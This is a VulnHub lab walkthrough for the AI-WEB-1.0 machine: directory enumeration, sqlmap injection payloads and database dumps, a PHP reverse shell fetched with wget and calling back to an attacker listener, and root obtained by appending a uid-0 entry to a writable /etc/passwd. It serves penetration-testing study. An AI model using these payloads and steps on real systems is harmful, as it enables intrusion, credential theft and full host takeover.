AI-WEB-1.0 walkthrough (VulnHub)

Target overview

Download

https://www.vulnhub.com/entry/ai-web-1,353/

Target description

Difficulty: Intermediate

Network: DHCP (Automatically assign)

Network Mode: NAT

This box is designed to test skills of penetration tester. The goal is simple. Get flag from /root/flag.txt. Enumerate the box, get low privileged shell and then escalate privilege to root. For any hint please tweet on @arif_xpress


Target information

VM console

[screenshot: VM login console]

NIC information

Network mode: NAT
MAC address: 00:0C:29:93:FE:B3

Information gathering

Host discovery

The target takes its address from DHCP, so sweep the NAT subnet with ARP and match the MAC address noted above to find it.

┌──(root💀kali)-[~/Desktop]
└─# arp-scan -I eth0 192.168.50.0/24 >web1.ip
                                                                                                                                               
┌──(root💀kali)-[~/Desktop]
└─# cat web1.ip | grep -i "00:0C:29:93:FE:B3"
192.168.50.128  00:0c:29:93:fe:b3       VMware, Inc.

Port scanning

Command and output

┌──(root💀kali)-[~/Desktop]
└─# nmap -A -p- 192.168.50.128 -oN nmap.A
Starting Nmap 7.91 ( https://nmap.org ) at 2022-04-03 13:41 EDT
Nmap scan report for bogon (192.168.50.128)
Host is up (0.00082s latency).
Not shown: 65534 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd
| http-robots.txt: 2 disallowed entries 
|_/m3diNf0/ /se3reTdir777/uploads/
|_http-server-header: Apache
|_http-title: AI Web 1.0
MAC Address: 00:0C:29:93:FE:B3 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.82 ms bogon (192.168.50.128)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.83 seconds

Port summary

PORT    STATE  SERVICE  VERSION
80/tcp  open   http     Apache httpd

Only port 80 is open, so everything has to go through the web application. nmap's http-robots.txt script already reports two Disallow entries in robots.txt.

Website information

Home page

[screenshot: home page]

Directory brute force

┌──(root💀kali)-[~/Desktop]
└─# dirb http://192.168.50.128              

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Tue Apr  5 19:51:38 2022
URL_BASE: http://192.168.50.128/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.50.128/ ----
+ http://192.168.50.128/index.html (CODE:200|SIZE:141)                                   
+ http://192.168.50.128/robots.txt (CODE:200|SIZE:82)                                    
+ http://192.168.50.128/server-status (CODE:403|SIZE:222)                                
                                                                                         
-----------------
END_TIME: Tue Apr  5 19:51:43 2022
DOWNLOADED: 4612 - FOUND: 3

dirb finds three paths:

http://192.168.50.128/index.html                                    
http://192.168.50.128/robots.txt                                    
http://192.168.50.128/server-status 

Visit each of them:

http://192.168.50.128/index.html

[screenshot: index.html]

http://192.168.50.128/robots.txt

[screenshot: robots.txt]

robots.txt contains two Disallow entries, which are exactly the places to look next:

http://192.168.50.128/m3diNf0/
http://192.168.50.128/se3reTdir777/uploads/

http://192.168.50.128/server-status

[screenshot: server-status returns 403 Forbidden]

http://192.168.50.128/m3diNf0/

[screenshot: /m3diNf0/]

http://192.168.50.128/se3reTdir777/uploads/

[screenshot: /se3reTdir777/uploads/]

The se3reTdir777 directory (parent of the uploads/ path listed in robots.txt)

http://192.168.50.128/se3reTdir777/

[screenshot: /se3reTdir777/]
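The enumeration above, generalised: as an added example (not code from the original walkthrough), a POSIX sh script that pulls every Disallow path out of a robots.txt body and probes each one for its HTTP status, which is exactly how the two hidden directories were located and checked here. It assumes awk and curl are installed; the robots.txt text embedded in it is constructed from the two entries nmap reported, and probe_paths only does anything when pointed at a live host.

```shell
#!/bin/sh
# Added example, not code from the original walkthrough.
# Assumes POSIX sh, awk and curl(1).

# Read a robots.txt body on stdin and print the path of every "Disallow:" line.
# Handles CRLF endings, "#" comments, mixed case, a missing space after the
# colon, and an empty Disallow (which means "allow everything" and yields nothing).
robots_disallow_paths() {
    tr -d '\r' | awk '
    {
        line = $0
        sub(/#.*/, "", line)                      # drop comments
        if (tolower(line) ~ /^[ \t]*disallow:/) {
            sub(/^[ \t]*[^:]*:[ \t]*/, "", line)  # strip the "Disallow:" directive
            sub(/[ \t]+$/, "", line)              # strip trailing whitespace
            if (line != "") print line
        }
    }'
}

# Request each path read from stdin and print "<status> <url>". A 200, 301 or
# 403 on a robots.txt entry deserves a closer look (dirb it); 404 usually does not.
probe_paths() {
    base="$1"   # e.g. http://192.168.50.128
    while read -r path; do
        code=$(curl -s -o /dev/null -w '%{http_code}' "$base$path")
        printf '%s %s%s\n' "$code" "$base" "$path"
    done
}

# Constructed sample matching the two entries nmap's http-robots.txt script reported.
SAMPLE_ROBOTS='User-agent: *
# keep the bots away from these
Disallow: /m3diNf0/
Disallow: /se3reTdir777/uploads/
Disallow:
'

# Usage against the live target:
#   curl -s http://192.168.50.128/robots.txt | robots_disallow_paths | probe_paths http://192.168.50.128
```

The parser is deliberately tolerant: real robots.txt files are hand-written, and a tester wants every hint from them, not only the RFC-clean ones.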

Scanning the sensitive directories

The m3diNf0 directory

┌──(root💀kali)-[~/Desktop]
└─# dirb http://192.168.50.128/m3diNf0/

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Sun Apr  3 14:40:01 2022
URL_BASE: http://192.168.50.128/m3diNf0/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.50.128/m3diNf0/ ----
+ http://192.168.50.128/m3diNf0/info.php (CODE:200|SIZE:84266)                                                                                              
                                                                                                                                                            
-----------------
END_TIME: Sun Apr  3 14:40:05 2022
DOWNLOADED: 4612 - FOUND: 1
                                        

The info.php page

http://192.168.50.128/m3diNf0/info.php

[screenshot: phpinfo() output]

The relevant values from the phpinfo() output:

User/Group               www-data(33)/33
Server Root              /etc/apache2
DOCUMENT_ROOT            /home/www/html/web1x443290o2sdf92213
CONTEXT_DOCUMENT_ROOT    /home/www/html/web1x443290o2sdf92213

The document root is a non-standard path that no wordlist would guess. This leak is what makes the later file write through sqlmap possible, since sqlmap needs the absolute path of a writable directory under the web root.

The se3reTdir777 directory

┌──(root💀kali)-[~/Desktop]
└─# dirb http://192.168.50.128/se3reTdir777/

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Sun Apr  3 14:46:09 2022
URL_BASE: http://192.168.50.128/se3reTdir777/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.50.128/se3reTdir777/ ----
+ http://192.168.50.128/se3reTdir777/index.php (CODE:200|SIZE:1228)                                                                                         
==> DIRECTORY: http://192.168.50.128/se3reTdir777/uploads/                                                                                                  
                                                                                                                                                            
---- Entering directory: http://192.168.50.128/se3reTdir777/uploads/ ----
                                                                                                                                                            
-----------------
END_TIME: Sun Apr  3 14:46:19 2022
DOWNLOADED: 9224 - FOUND: 1

http://192.168.50.128/se3reTdir777/index.php

[screenshot: the index.php form, which takes a user ID and POSTs it as uid together with Operation=Submit]

Vulnerability mapping

SQL injection

The form in se3reTdir777/index.php submits uid and Operation by POST, so that request body is handed to sqlmap. The output below says "resuming ... from stored session" because it is a re-run; on the first run sqlmap performs the detection itself and reaches the same injection points.

┌──(root💀kali)-[~]
└─# sqlmap -u "http://192.168.50.128/se3reTdir777/" --data "uid=1&Operation=Submit"
        ___
       __H__                                                                                  
 ___ ___[(]_____ ___ ___  {1.5.6#stable}                                                      
|_ -| . [']     | .'| . |                                                                     
|___|_  [.]_|_|_|__,|  _|                                                                     
      |_|V...       |_|   http://sqlmap.org                                                   

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 15:01:07 /2022-04-05/

[15:01:08] [INFO] resuming back-end DBMS 'mysql' 
[15:01:08] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: uid (POST)
    Type: error-based
    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
    Payload: uid=1' AND EXTRACTVALUE(3611,CONCAT(0x5c,0x71707a7671,(SELECT (ELT(3611=3611,1))),0x716b7a7071)) AND 'vRtd'='vRtd&Operation=Submit

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: uid=1' AND (SELECT 4991 FROM (SELECT(SLEEP(5)))lASY) AND 'rpte'='rpte&Operation=Submit

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: uid=1' UNION ALL SELECT NULL,NULL,CONCAT(0x71707a7671,0x635570486f4450564d59484a7977534d4566766454627355655277737a626b534d7a434d59786864,0x716b7a7071)-- -&Operation=Submit
---
[15:01:08] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL >= 5.1
[15:01:08] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.50.128'                                                                                 
[15:01:08] [WARNING] your sqlmap version is outdated

[*] ending @ 15:01:08 /2022-04-05/

Exploitation

Exploiting the SQL injection

Extracting data

sqlmap options used, in order:

--current-db                        name of the current database
-D aiweb1 --tables                  tables in the aiweb1 database
-D aiweb1 -T user --dump            dump the user table
-D aiweb1 -T systemUser --dump      dump the systemUser table
┌──(root💀kali)-[~]
└─# sqlmap -u "http://192.168.50.128/se3reTdir777/" --data "uid=1&Operation=Submit" --current-db
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.5.5#stable}
|_ -| . ["]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 08:04:01 /2022-04-05/

[08:04:01] [INFO] resuming back-end DBMS 'mysql' 
[08:04:01] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: uid (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
    Payload: uid=1' OR NOT 3245=3245#&Operation=Submit

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: uid=1' AND GTID_SUBSET(CONCAT(0x716b707a71,(SELECT (ELT(4512=4512,1))),0x7170717871),4512)-- CEun&Operation=Submit

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: uid=1' AND (SELECT 3172 FROM (SELECT(SLEEP(5)))uyYv)-- EcBM&Operation=Submit

    Type: UNION query
    Title: MySQL UNION query (NULL) - 3 columns
    Payload: uid=1' UNION ALL SELECT NULL,NULL,CONCAT(0x716b707a71,0x73614d58526d67785061444d7a7a5976564e507345426f5842416b4e744161716477465162564856,0x7170717871)#&Operation=Submit
---
[08:04:02] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL >= 5.6
[08:04:02] [INFO] fetching current database
current database: 'aiweb1'
[08:04:02] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.50.128'                                                           
[08:04:02] [WARNING] your sqlmap version is outdated

[*] ending @ 08:04:02 /2022-04-05/


                                                                                
┌──(root💀kali)-[~]
└─# sqlmap -u "http://192.168.50.128/se3reTdir777/" --data "uid=1&Operation=Submit" -D "aiweb1" --tables
        ___
       __H__                                                                       
 ___ ___[(]_____ ___ ___  {1.5.5#stable}                                           
|_ -| . [.]     | .'| . |                                                          
|___|_  [.]_|_|_|__,|  _|                                                          
      |_|V...       |_|   http://sqlmap.org                                        

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 08:05:18 /2022-04-05/

[08:05:18] [INFO] resuming back-end DBMS 'mysql' 
[08:05:18] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: uid (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
    Payload: uid=1' OR NOT 3245=3245#&Operation=Submit

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: uid=1' AND GTID_SUBSET(CONCAT(0x716b707a71,(SELECT (ELT(4512=4512,1))),0x7170717871),4512)-- CEun&Operation=Submit

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: uid=1' AND (SELECT 3172 FROM (SELECT(SLEEP(5)))uyYv)-- EcBM&Operation=Submit

    Type: UNION query
    Title: MySQL UNION query (NULL) - 3 columns
    Payload: uid=1' UNION ALL SELECT NULL,NULL,CONCAT(0x716b707a71,0x73614d58526d67785061444d7a7a5976564e507345426f5842416b4e744161716477465162564856,0x7170717871)#&Operation=Submit
---
[08:05:18] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL >= 5.6
[08:05:18] [INFO] fetching tables for database: 'aiweb1'
Database: aiweb1
[2 tables]
+------------+
| user       |
| systemUser |
+------------+

[08:05:18] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.50.128'                                                           
[08:05:18] [WARNING] your sqlmap version is outdated

[*] ending @ 08:05:18 /2022-04-05/

┌──(root💀kali)-[~]
└─# sqlmap -u "http://192.168.50.128/se3reTdir777/" --data "uid=1&Operation=Submit" -D "aiweb1" -T "user" --dump
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.5.5#stable}                                                                                                                                
|_ -| . [(]     | .'| . |                                                                                                                                               
|___|_  ["]_|_|_|__,|  _|                                                                                                                                               
      |_|V...       |_|   http://sqlmap.org                                                                                                                             

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 08:07:46 /2022-04-05/

[08:07:47] [INFO] resuming back-end DBMS 'mysql' 
[08:07:47] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: uid (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
    Payload: uid=1' OR NOT 3245=3245#&Operation=Submit

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: uid=1' AND GTID_SUBSET(CONCAT(0x716b707a71,(SELECT (ELT(4512=4512,1))),0x7170717871),4512)-- CEun&Operation=Submit

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: uid=1' AND (SELECT 3172 FROM (SELECT(SLEEP(5)))uyYv)-- EcBM&Operation=Submit

    Type: UNION query
    Title: MySQL UNION query (NULL) - 3 columns
    Payload: uid=1' UNION ALL SELECT NULL,NULL,CONCAT(0x716b707a71,0x73614d58526d67785061444d7a7a5976564e507345426f5842416b4e744161716477465162564856,0x7170717871)#&Operation=Submit
---
[08:07:47] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL >= 5.6
[08:07:47] [INFO] fetching columns for table 'user' in database 'aiweb1'
[08:07:47] [INFO] fetching entries for table 'user' in database 'aiweb1'
Database: aiweb1
Table: user
[3 entries]
+----+----------+-----------+
| id | lastName | firstName |
+----+----------+-----------+
| 1  | admin    | admin     |
| 2  | root     | root      |
| 3  | mysql    | mysql     |
+----+----------+-----------+

[08:07:47] [INFO] table 'aiweb1.`user`' dumped to CSV file '/root/.local/share/sqlmap/output/192.168.50.128/dump/aiweb1/user.csv'
[08:07:47] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.50.128'
[08:07:47] [WARNING] your sqlmap version is outdated

[*] ending @ 08:07:47 /2022-04-05/

┌──(root💀kali)-[~]
└─# sqlmap -u "http://192.168.50.128/se3reTdir777/" --data "uid=1&Operation=Submit" -D "aiweb1" -T "systemUser" --dump
        ___
       __H__                                                                                                                                                            
 ___ ___[(]_____ ___ ___  {1.5.5#stable}                                                                                                                                
|_ -| . [.]     | .'| . |                                                                                                                                               
|___|_  [(]_|_|_|__,|  _|                                                                                                                                               
      |_|V...       |_|   http://sqlmap.org                                                                                                                             

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 08:11:29 /2022-04-05/

[08:11:29] [INFO] resuming back-end DBMS 'mysql' 
[08:11:29] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: uid (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
    Payload: uid=1' OR NOT 3245=3245#&Operation=Submit

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: uid=1' AND GTID_SUBSET(CONCAT(0x716b707a71,(SELECT (ELT(4512=4512,1))),0x7170717871),4512)-- CEun&Operation=Submit

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: uid=1' AND (SELECT 3172 FROM (SELECT(SLEEP(5)))uyYv)-- EcBM&Operation=Submit

    Type: UNION query
    Title: MySQL UNION query (NULL) - 3 columns
    Payload: uid=1' UNION ALL SELECT NULL,NULL,CONCAT(0x716b707a71,0x73614d58526d67785061444d7a7a5976564e507345426f5842416b4e744161716477465162564856,0x7170717871)#&Operation=Submit
---
[08:11:29] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL >= 5.6
[08:11:29] [INFO] fetching columns for table 'systemUser' in database 'aiweb1'
[08:11:29] [INFO] fetching entries for table 'systemUser' in database 'aiweb1'
[08:11:29] [INFO] recognized possible password hashes in column 'password'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] n
do you want to crack them via a dictionary-based attack? [Y/n/q] n
Database: aiweb1
Table: systemUser
[3 entries]
+----+----------------------------------------------+-----------+
| id | password                                     | userName  |
+----+----------------------------------------------+-----------+
| 1  | RmFrZVVzZXJQYXNzdzByZA==                     | t00r      |
| 2  | TXlFdmlsUGFzc19mOTA4c2RhZjlfc2FkZmFzZjBzYQ== | aiweb1pwn |
| 3  | TjB0VGhpczBuZUFsczA=                         | u3er      |
+----+----------------------------------------------+-----------+

[08:11:33] [INFO] table 'aiweb1.systemUser' dumped to CSV file '/root/.local/share/sqlmap/output/192.168.50.128/dump/aiweb1/systemUser.csv'
[08:11:33] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.50.128'
[08:11:33] [WARNING] your sqlmap version is outdated

[*] ending @ 08:11:33 /2022-04-05/
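sqlmap flagged the password column as "possible password hashes" and the author declined to crack them, but the trailing "=" padding and the alphabet mark these values as plain base64, not hashes. As an added example (not code from the original walkthrough), a POSIX sh helper that recognises base64 syntactically, decodes it with base64(1), and refuses anything that does not decode to printable text; the three values it runs over are copied from the dump above. Only port 80 is open on this box, so the recovered strings play no further part here, but on a target with SSH they would be the first credentials to try.

```shell
#!/bin/sh
# Added example, not code from the original walkthrough.
# Assumes POSIX sh, grep -E and base64(1) with -d (GNU coreutils / busybox).

# Syntactic check: base64 alphabet, length a multiple of 4, padding only at the end.
looks_like_base64() {
    printf '%s' "$1" | grep -Eq '^([A-Za-z0-9+/]{4})*([A-Za-z0-9+/]{2}==|[A-Za-z0-9+/]{3}=)?$'
}

decode_b64() {
    printf '%s' "$1" | base64 -d 2>/dev/null
}

# Print the decoded value when it is printable text; otherwise print a reason
# (not-base64 / decode-failed / binary) and return non-zero. A hash such as
# $1$... or a hex digest fails the first check and is left for hashcat instead.
decode_if_printable() {
    [ -n "$1" ] || { echo "empty"; return 1; }
    looks_like_base64 "$1" || { echo "not-base64"; return 1; }
    out=$(decode_b64 "$1") || { echo "decode-failed"; return 1; }
    if printf '%s' "$out" | LC_ALL=C grep -q '[^[:print:]]'; then
        echo "binary"; return 1
    fi
    printf '%s\n' "$out"
}

# Constructed input: userName:password pairs copied from the systemUser dump above.
SYSTEM_USERS='t00r:RmFrZVVzZXJQYXNzdzByZA==
aiweb1pwn:TXlFdmlsUGFzc19mOTA4c2RhZjlfc2FkZmFzZjBzYQ==
u3er:TjB0VGhpczBuZUFsczA='

# Decode every row and print user:cleartext.
decode_dump() {
    printf '%s\n' "$SYSTEM_USERS" | while IFS=: read -r user b64; do
        printf '%s:%s\n' "$user" "$(decode_if_printable "$b64")"
    done
}

# Usage: decode_dump
```

The printable-text check matters: random bytes will often pass a purely syntactic base64 test, and treating a real binary digest as "decoded" just hides the fact that it still needs cracking.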

Getting an OS shell with sqlmap --os-shell

The author ran sqlmap from inside msfconsole (the msf6 > prompt simply execs the command; Metasploit itself plays no part). On MySQL, --os-shell writes a PHP file stager into the web root through the injection (SELECT ... INTO OUTFILE / LINES TERMINATED BY), so it needs three things: the FILE privilege for the application's database user, no secure_file_priv restriction blocking the write, and a directory under the web root that the MySQL process can write to, given as an absolute path. sqlmap cannot discover that path on its own here, which is why the DOCUMENT_ROOT leaked by info.php plus the uploads/ directory from robots.txt is supplied as a custom location below.

msf6 > sqlmap -u "http://192.168.50.128/se3reTdir777/" --data "uid=1&Operation=Submit" --os-shell
[*] exec: sqlmap -u "http://192.168.50.128/se3reTdir777/" --data "uid=1&Operation=Submit" --os-shell

        ___
       __H__                                                                       
 ___ ___[(]_____ ___ ___  {1.5.5#stable}                                           
|_ -| . [)]     | .'| . |                                                          
|___|_  [(]_|_|_|__,|  _|                                                          
      |_|V...       |_|   http://sqlmap.org                                        

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 07:47:34 /2022-04-05/

[07:47:35] [INFO] resuming back-end DBMS 'mysql' 
[07:47:35] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: uid (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
    Payload: uid=1' OR NOT 3245=3245#&Operation=Submit

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: uid=1' AND GTID_SUBSET(CONCAT(0x716b707a71,(SELECT (ELT(4512=4512,1))),0x7170717871),4512)-- CEun&Operation=Submit

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: uid=1' AND (SELECT 3172 FROM (SELECT(SLEEP(5)))uyYv)-- EcBM&Operation=Submit

    Type: UNION query
    Title: MySQL UNION query (NULL) - 3 columns
    Payload: uid=1' UNION ALL SELECT NULL,NULL,CONCAT(0x716b707a71,0x73614d58526d67785061444d7a7a5976564e507345426f5842416b4e744161716477465162564856,0x7170717871)#&Operation=Submit
---
[07:47:35] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL >= 5.6
[07:47:35] [INFO] going to use a web backdoor for command prompt
[07:47:35] [INFO] fingerprinting the back-end DBMS operating system
[07:47:35] [INFO] the back-end DBMS operating system is Linux
which web application language does the web server support?
[1] ASP
[2] ASPX
[3] JSP
[4] PHP (default)
> 4
do you want sqlmap to further try to provoke the full path disclosure? [Y/n] y
[07:47:54] [WARNING] unable to automatically retrieve the web server document root
what do you want to use for writable directory?
[1] common location(s) ('/var/www/, /var/www/html, /var/www/htdocs, /usr/local/apache2/htdocs, /usr/local/www/data, /var/apache2/htdocs, /var/www/nginx-default, /srv/www/htdocs, /usr/local/var/www') (default)
[2] custom location(s)
[3] custom directory list file
[4] brute force search
> 2
please provide a comma separate list of absolute directory paths: /home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/
[07:55:23] [WARNING] unable to automatically parse any web server path
[07:55:24] [INFO] trying to upload the file stager on '/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/' via LIMIT 'LINES TERMINATED BY' method             
[07:55:24] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[07:55:24] [INFO] the file stager has been successfully uploaded on '/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/' - http://192.168.50.128:80/se3reTdir777/uploads/tmpunxnh.php
[07:55:24] [INFO] the backdoor has been successfully uploaded on '/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/' - http://192.168.50.128:80/se3reTdir777/uploads/tmpboona.php
[07:55:24] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER

Check which user the commands run as:

os-shell> whoami
do you want to retrieve the command standard output? [Y/n/a] y
command standard output: 'www-data'
os-shell> id
do you want to retrieve the command standard output? [Y/n/a] y
command standard output: 'uid=33(www-data) gid=33(www-data) groups=33(www-data)'


Create a PHP reverse-shell script on the Kali box (the author names it webshell.php, although it is not a web shell). It connects back to the attacker at 192.168.50.129:8888 and attaches an interactive /bin/sh to the socket, which in php-cli is normally file descriptor 3, hence the <&3 >&3 2>&3 redirections:

┌──(root💀kali)-[~/Desktop]
└─# cat webshell.php                         
<?php
$sock=fsockopen("192.168.50.129",8888);
exec("/bin/sh -i <&3 >&3 2>&3");
?>

Serve the file with Python's built-in HTTP server

Python 2 ships a minimal HTTP server module; one command, run in the directory to be served, starts it:

python -m SimpleHTTPServer 9966
# 9966 is the port; pick any free one

In Python 3 the SimpleHTTPServer module has been merged into http.server (2to3 adapts the import automatically when converting sources to Python 3), so the equivalent command is:

python -m http.server 9966
# 9966 is the port; pick any free one

The Python here is 2.7.18, so the Python 2 form is used.

# Note: the server's document root is the directory it is started from, here ~/Desktop

┌──(root💀kali)-[~/Desktop]
└─# python -m SimpleHTTPServer 9966
Serving HTTP on 0.0.0.0 port 9966 ...

The server is up. Open it in a browser on the attacker machine to confirm it serves the directory:

[screenshot: directory listing served by SimpleHTTPServer]

The listing shows that the file just created is downloadable.

Download the file onto the target

Back in the os-shell window, fetch the file. The backdoor's working directory is the uploads/ directory, so that is where it lands:

http://192.168.50.129:9966/webshell.php

os-shell> wget -S http://192.168.50.129:9966/webshell.php
do you want to retrieve the command standard output? [Y/n/a] y
command standard output:
---
--2022-04-05 15:50:12--  http://192.168.50.129:9966/webshell.php
Connecting to 192.168.50.129:9966... connected.
HTTP request sent, awaiting response... 
  HTTP/1.0 200 OK
  Server: SimpleHTTP/0.6 Python/2.7.18
  Date: Tue, 05 Apr 2022 23:10:37 GMT
  Content-type: application/octet-stream
  Content-Length: 82
  Last-Modified: Tue, 05 Apr 2022 22:38:11 GMT
Length: 82 [application/octet-stream]
Saving to: 'webshell.php'

     0K                                                       100% 9.22M=0s

2022-04-05 15:50:12 (9.22 MB/s) - 'webshell.php' saved [82/82]

---

The request sometimes fails; retrying a few times works.

In another terminal, start a listener on port 8888:

┌──(root💀kali)-[~/Desktop]
└─# nc -lvp 8888
listening on [any] 8888 ...

Run the downloaded script from the os-shell. The command blocks for as long as the reverse shell stays connected, and the nc window receives a shell:

os-shell> php webshell.php
do you want to retrieve the command standard output? [Y/n/a] y

Privilege escalation

First upgrade the raw shell to a PTY with python so it is easier to work with:

$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@aiweb1:/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads$ 

The current user is www-data, not root, but on this box /etc/passwd is writable by www-data (the echo >> below succeeds). Check with ls -l /etc/passwd before counting on it: on a correctly configured system the file is mode 0644 and owned by root.

$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Add a new user with uid 0. The password field of /etc/passwd holds a hash, not the plaintext, so generate one first:

openssl passwd -1 -salt web1 123456    # MD5-crypt ($1$) hash of the password 123456 with salt "web1"
$1$web1$ZrYgDZgZpLlsnVlxUaZwh/         # crypt(3)-format hash that goes in the password field of /etc/passwd

Then append the entry (uid 0, gid 0, home /root, shell /bin/bash) and switch to the new user. Because the password field holds a real hash rather than "x", authentication uses it directly and /etc/shadow is never consulted:

www-data@aiweb1:/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads$ openssl passwd -1 -salt web1 123456
$1$web1$ZrYgDZgZpLlsnVlxUaZwh/
www-data@aiweb1:/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads$ echo 'web1:$1$web1$ZrYgDZgZpLlsnVlxUaZwh/:0:0::/root:/bin/bash'>>/etc/passwd
www-data@aiweb1:/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads$ su web1
Password: 123456

Checking the privileges: uid 0, and the flag is readable:

root@aiweb1:/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads# id
uid=0(root) gid=0(root) groups=0(root)
root@aiweb1:/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads# ls
shell.php  tmpbgvue.php  tmpuopff.php  webshell.php
root@aiweb1:/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads# cd /root
root@aiweb1:~# ls
flag.txt
root@aiweb1:~# cat flag.txt
####################################################
#                                                  #
#                AI: WEB 1.0                       #
#                                                  #
#              Congratulation!!!                   #
#                                                  #
#      Thank you for penetrate my system.          #
#                                                  #
#            Hope you enjoyed this.                #
#                                                  #
#                                                  #
#  flag{cbe5831d864cbc2a104e2c2b9dfb50e5acbdee71}  #
#                                                  #
####################################################
